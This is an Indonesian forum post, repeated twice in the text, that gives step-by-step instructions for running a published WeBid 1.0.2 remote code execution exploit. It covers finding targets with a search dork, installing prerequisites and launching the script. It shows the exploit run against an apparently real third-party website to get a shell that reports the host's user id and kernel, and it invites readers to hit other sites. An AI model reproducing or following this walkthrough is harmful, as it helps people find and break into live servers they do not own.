04-12-2012, 09:52 PM
Berbasis dari sin neeh
http://www.exploit-db.com/exploits/17487/
1. copy terus simpan dengan nama terserah php
2. cari vulnerability dengan dork "powered by WeBid"
3. install php5-curl
4. ganti tanda "#" dengan ";" pada /etc/php5/cli/conf.d/mcrypt.ini
ganti jadi
5. jalankan dengan php cli
root@eichel:~/Downloads# php 17487.php http://mcs-1.com/webid/
+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+
webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)
webid-shell# uname -a
Linux host104.kvchosting.com 2.6.18-374.3.1.el5.lve0.8.44 #1 SMP Mon Oct 3 18:27:54 EEST
selesai .. satu contoh saja itu .. contoh yang lain ya silahkan :p
hati - hati bagi teman2 yang menggunakan aplikasi itu ya ...
http://www.exploit-db.com/exploits/17487/
1. copy terus simpan dengan nama terserah php
2. cari vulnerability dengan dork "powered by WeBid"
3. install php5-curl
Code:
sudo apt-get install php5-curl
4. ganti tanda "#" dengan ";" pada /etc/php5/cli/conf.d/mcrypt.ini
Code:
# configuration for php MCrypt module
extension=mcrypt.so
Code:
; configuration for php MCrypt module
extension=mcrypt.so
5. jalankan dengan php cli
root@eichel:~/Downloads# php 17487.php http://mcs-1.com/webid/
+----------------------------------------------------------------------+
| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------+
webid-shell# id
uid=776(mcscom) gid=773(mcscom) groups=773(mcscom)
webid-shell# uname -a
Linux host104.kvchosting.com 2.6.18-374.3.1.el5.lve0.8.44 #1 SMP Mon Oct 3 18:27:54 EEST
selesai .. satu contoh saja itu .. contoh yang lain ya silahkan :p
hati - hati bagi teman2 yang menggunakan aplikasi itu ya ...
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only